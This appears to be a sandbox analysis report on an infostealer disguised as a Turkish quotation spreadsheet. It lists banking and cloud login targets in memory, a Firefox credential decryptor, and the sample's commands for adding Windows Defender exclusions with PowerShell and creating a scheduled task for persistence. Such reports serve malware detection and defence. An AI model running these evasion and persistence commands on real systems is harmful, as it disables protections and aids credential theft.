Source: OnCgVRIhY.exe, 0000000E.00000002.4512900088.00000000010DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4513396357.0000000001326000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: OnCgVRIhY.exe, 0000000A.00000002.2135022850.00000000072BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF8CC8 LdrInitializeThunk,LdrInitializeThunk, 14_2_06BF8CC8
Enables debug privileges
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe" Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process created: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
